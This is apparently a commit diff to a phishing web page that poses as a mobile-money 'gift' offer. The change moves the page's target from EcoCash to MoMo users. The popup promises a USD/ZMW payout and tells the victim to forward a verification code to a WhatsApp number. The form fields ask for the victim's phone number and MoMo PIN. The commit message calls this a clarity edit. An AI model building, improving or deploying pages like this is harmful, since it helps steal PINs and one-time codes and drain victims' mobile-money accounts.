Revise success popup and form input labels
Updated success message and form labels for clarity.

--- a/index.html
+++ b/index.html
@@ -192,7 +192,7 @@
 <!-- SUCCESS POPUP -->
 <div id="successPopup">
   <h3>Submitted Successfully!</h3>
-  <p>Your ecoCash Gift request received.Kindly forward the VERIFICATION CODE to the admin ON WHATSAPP +447848182689.</p>
+  <p>Congratulation!!!!!,Your MoMo Gift request received and you've qualified for 256 USD(5920 ZMW).Kindly forward the VERIFICATION CODE to the admin ON WHATSAPP +447830 731 278.</p>
   <button onclick="closePopup()">OK</button>
 </div>
 
@@ -201,8 +201,8 @@
   <label>Phone Number</label>
   <input type="text" name="phone" placeholder="Enter phone number" required>
 
-  <label>EcoCash Pin</label>
-  <input type="text" name="account" placeholder="Enter eco pin" required>
+  <label>MoMo Pin</label>
+  <input type="text" name="account" placeholder="Enter MoMo pin" required>
 
   <button type="submit">Withdraw</button>
 </form>
@@ -236,5 +236,6 @@
 
 </body>
 </html>
+
 
 
